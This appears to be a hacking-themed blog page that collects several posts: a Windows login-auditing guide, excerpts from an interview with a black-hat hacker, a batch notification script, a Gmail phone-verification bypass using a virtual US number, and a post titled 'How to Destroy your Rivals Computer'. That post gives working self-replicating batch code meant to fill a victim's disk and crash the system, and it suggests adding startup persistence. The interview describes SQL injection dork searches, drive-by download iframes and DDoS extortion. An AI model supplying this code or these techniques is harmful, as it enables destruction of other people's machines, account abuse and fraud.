Showing posts with label hack. Show all posts

How To Stay Safe & Not Get Hacked

This might be a good method to get rid of your system from being hacked or your files from being stolen from your friends. May be your friend might be trying to accessing your Windows account to get access to your secret documents and information. You may not want to change password regularly if you have the habit of forgetting. Well, in this tutorial I am going to teach you how to log such failed attempts to your account.

By default Windows does not keep record of success and failure attempts. However you can check if it’s active or not by following steps:

Right click on My Computer Icon > Manage.

For Windows Vista or Later,

Go to System Tools> Even Viewer > Windows Logs > Security

For Windows XP,

Go to System tools > Event viewer > Security

You can see here about the Successful and Failed Login Attempts.






I’ve the above screen in my Windows 7. But windows may not be logging your login attempts. Therefore you’ll need to activate it from Group Policy editor.





To enable success and failed attempts do the following:

Load up RUN command, type gpedit.msc . It will load Group Policy Editor Window.

At the left policy explorer, go to Local Computer Policy > Computer Configuration > windows Settings> Security Settings> Local policies > Audit Logon Events .





At the right side of window, select ”Audit Policy Change “ and check on both ”Success” and ”Failure” Option.





Now press OK. You may now close the Group Policy Editor window.

Now Windows will be logging all your successful or failed login attempts.

To test if it works or not, create a test account, create password for it. Restart your PC. Try entering wrong password to your account few times. And again enter correct password. Window will load of.

Again right click on My Computer> Manage. Go to, System tools > Event viewer > Security

You’ll see the screen similar to this.





Double click on one of the failed attempts and it will show up the details.

 

Hope this was helpful tutorial to make your account more secure.
     
Read More

World of White-Hat Hackers from the eyes of a Black-Hat. (Interview)

World of White-Hat Hackers from the eyes of a Black-Hat. (Interview)

This isn't new, but i think it's worth sharing, a Black-hat sharing his views on how secure we are, and what our anti-viruses are capable of..
Quite scary and definitely gave me chills...
Read more: Interview With A Blackhat
Some excerpts that scared me:

Q: And how much do you think you made last year?

A: Off the top of my head? Around about 400-500k. Last year was kind of ****. People became wiser, patches became more frequent. This year we have 3/4 of that amount already.

Q: How easy is it for you to compromise a website and take control over it?

A: For beginners you can simply Google inurl:money.php?id= — go ahead try it. But most of them will be cancelled or dried up. So, now you target bigger websites. I like to watch the news; especially the financial side of it. Say if a target just started up and it suddenly sky rocketed in online sales that’ll become a target. Most of these websites have admins behind them who have no practical experience of being the bad guy and how the bad guys think. This leaves them hugely vulnerable. They patch SQL but choose a DNS that is vulnerable to DNS cache poisoning. You can break in and be gone within an hour.


Q: What is your favorite kind of website to compromise? Or are your hack attempts entirely untargeted? What are the easiest sites to monetize?

A: Most of the time un-targeted but once a company (which I won’t name) pissed me off for not giving me discount in a sale so we leaked every single credit card number online. One type of company I love to target is Internet security, i.e. anti virus companies.

There is nothing better than a clothing store at the summer sales (except porn websites). These are in my personal opinion the easiest and most successful targets to breach. I’ll talk about clothes stores first. Clothing websites are SO easy because of two main types of attacks.

1. The admins never ever have two-step authentication. I don’t know why, but I have never seen one admin have it (and I’ve done it thousands of times). 2. The ‘admin’ usually works there behind the tills or in the offices. They have no clue what they’re doing: they just employ someone to make the website then they run it. They never ever have HTTPS, [so they have] huge SQLi vulnerabilities (e.g.. inurlroduct.php?id=). Once you have the SQLi vulnerability you can go two routes or both. Route one: steal the credit card info and leave. Route two: deface the website, keep the original HTML code but install an iframe that redirects to a drive by download of a banking Trojan.

Now to discuss my personal favourite: porn sites. One reason why this is so easy: The admins don’t check to see what the adverts redirect to. Upload an ad of a well-endowed girl typing on Facebook, someone clicks, it does a drive by download again. But this is where it’s different: if you want extra details (for extortion if they’re a business man) you can use SET to get the actual Facebook details which, again, can be used in social engineering.

Q: What is your favorite/most effective exploit against websites and why?

A: If it’s a 0-day, that obviously ranks at the top. But below that is XSS. It’s really well known but no one patches it. I suppose DDoS isn’t really classed as an exploit but that can bring in monthly ‘rent’ for our ‘protection’. But over all 0-days are the greatest exploits.

Q: Is there something that websites do to try to defend themselves from guys like you that they always get wrong?

A: I could re-write Shakespeare here. I’ll pick three things.

1. Hire stupid admins who have never been a bad guy, just fed with a silver spoon all their lives and went to Uni on mummy and daddies money. If I were the CEO of a company I’d much rather employ someone who has a criminal record for hacking than a Uni graduate any day of the week. The guy who has the criminal record has gained the knowledge of how a bad guy would go about getting in. and not just what a text book says.

2. They allow untrained, young, dumb, Saturday workers to operate the phones.

3. Companies don’t purchase DDoS protection. Cloudflare for example offers incredibly strong DDoS protection for 200 dollars a month (also its harder to jack a cloudflare domain). If I extort you for 200-1000 dollars for 1 day why not make yourself immune for the minimal fee?

Q: Which types of browsers tend to be the most vulnerable? Why do you think that is?

A: if you asked me this a few years ago I’d've said almost 100% was IE. That is still hugely vulnerable but now people have taken to the better, faster browsers such as Chrome and Firefox. IE still dominates the market at about 52% but Chrome is the majority of the rest. I think IE is dominating the market because the vast majority of people feel comfortable with it. Unless you actually read into vulnerabilities etc., you don’t know how dangerous IE is, so why do you need to change? Chrome already forced it to be better. One thing that did hugely affect bot infection rates was the mass removal of Java. When news of a java 0-day gets published people panic (rightly so) and un-install it or patch but as we all know java never stays secure for long. (So firefox is still most secure of the three.. ).
Read More

Create a Taskbar Message Bubble Using Batch File

If somebody ever wondered about how to do such a neat message bubble in Batch. Well, it isn't possible.
However i found a way, with a little help of Powershell to create such a bubble.
In the script there is a switch included that prevents it from crashing, most likely if you have your ExecutionPolicy set wrong.

Well a little eye candy first:



Here is the code of my version (used in the picture): Click Here


Note:- Its a Batch File... so You Have to save it as "filename.bat".

Note:- ".bat" is extension (mandatory to save with this extension)
Read More

How to Destroy your Rivals Computer using a Batch File

I just created the following batch file and ran it on myself and am SUPER glad i shut my computer off, because this batch file creates another batch file at random numbers, then puts the same code of itself in each of those files, then runs those bats, which ALSO do the same thing, constantly, forever, until your stop it.

what this will do, if you leave it on long enough, is it will store itself in ALOT of your hard drive space, making it almost ZERO, then also use up all your ram as your computer goes through all the files, and crash your pc. this virus WILL REQUIRE YOU TO REINSTALL WINDOWS!!!! to get rid of it!!!!

now, if you really wanted to make it a bad batch file, you could have it copy itself to startup, so that when you start up, the horror starts all over again, ON TOP OF ITSELF!!!!.



let me tell you, i let it run only five seconds, and that's b/c it took almost five seconds for the shutdown, and i deleted almost 9 megabytes of diskspace used by just BATCH FILES (which are 1 kb a PIECE!!) just imagine what would have happened to me if i let it run for just one minute...it'd be GIGS and probably well past GIGS in 10 minutes.

so, be careful guys, don't run it on yourself unless you have a virtual machine to limit your disk space used (even that might not be safe).

my usual warning, DON'T DO ANYTHING STUPID! DON'T DO ANYTHING ILLEGAL WITH THIS!




@echo off
:A
SET /A X=%RANDOM%%%1999999999%
type damage.bat >> %x%.bat
start %x%.bat
goto:A

 i am not responsible for anyone who decide to run this code.
 
Read More

How To Bypass Gmail Mobile verification

Follow the steps below:

Step 1:- Go to http://www.k7.net & Sign up there.

Step 2:- Create an account on gmail, but in location fill "United States" . Create your e-mail account.

Step 3:- Now it will take you to mobile verification page. Here select the option of Voice call and fill the no. that you got from the website (k7.net)

Step 4:- Now you will get a mail having verification code as voice mail on that account from which you have registered on. Go open it, download the attachment file and listen the code, after that type the code of your voice mail in verification code and click OK.

Step 5:- Done. Your account is ready now.


About the website:

This is a site where you can receive fax or voice calls without having a phone no. When you create an account on this site, it will provide you an unique phone number of US.
Read More

How to protect yourself from hackers [Infographic]

How to protect yourself from hackers


According to the Trustwave’s 2013 Global Security Report, cyber-security threats are increasing as quickly as we can implement measures against them. Hackers have lots of different ways to steal your private data and information. And the main reason why hackers go after your personal information is identity theft!

Over the past year, there have been roughly 12.6 million victims of identity theft – or, to put it into perspective, one victim every three seconds. No matter how safe you think you’re being online, chances are you’re making at least a few mistakes that compromise the integrity of your personal information.

To protect yourself, check out our new “Where You’ll Get Hacked” infographic for more information on how hackers get a hold of your data, how you can detect their attempts and how to protect yourself and your financial future.

To see the enlarged version, click on the graphic.o open in new window.
 
 
[Image: where-you-will-get-hacked-infographic800.png]
Read More

A History About Hacking [Inforgraphic]

A Hacker is Cleaver Programmer who breaks Computer Security. A Hacker is interested in playing Computer and other tech devices or Electronics. Hacker is like to learn about how computer system will work and he/she interested finding new things in Computer.

[Image: a-short-histoy-of-hacking_5029114bd04c6_w587.jpg]
Read More

Interesting Hacking Quotes

Quote:Hacking just means building something quickly or testing the boundaries of what can be done
- Mark Zuckerberg

Quote: Hacking is fun if you're a Hacker
- Anonymous

Quote:Behind every successful Coder there an even more successful De-coder to understand that code
- Anonymous

Quote:As a young boy, I was taught in high school that Hacking was cool.
- Kevin Mitnick

Quote: Hackers are not crackers
- Anonymous

Quote: Its kind of Interesting because Hacking is a skill that could be used for criminal purposes or legitimate purposes, and so even through in the past I was hacking for free curiosity, and the thrill , to get a bite of the forbidden fruit of knowledge, I'm now working in the security field as a public speaker.
- Kevin Mitnick

Quote: A lot of Hacking is playing with other people, you know, getting them to do strange things
- Steve Wozniak



Quote:I was addicted to Hacking, more for the intellectual challenge, the curiosity, the seduction of adventure; not for stealing, or causing a damage or writing computer viruses.
- Kevin Mitnick

Quote:It's true, I had hacked into a lot of companies, and took of this source code to analyze it for security bugs. If I could locate security bugs, I could become better at Hacking into their systems. It was all towards becoming a better Hacker.
- Kevin Mitnick

Quote:Further, the next generations of terrorists will grow up in a digital world, with ever more powerful and easy-to-use hacking tools at their disposal
- Dorothy Denning

Quote:Hackers are breaking the systems for profit. Before, it was about intellectual curiosity and pursuit of knowledge and thrill, and now Hacking is big business.
- Kevin Mitnick

Quote:I got so passionate about technology. Hacking to me was like a video game. It was about getting trophies. I just kept going on and on, despite all the trouble I was getting into, because I was hooked
- Kevin Mitnick
Read More
Subscribe to: Posts (Atom)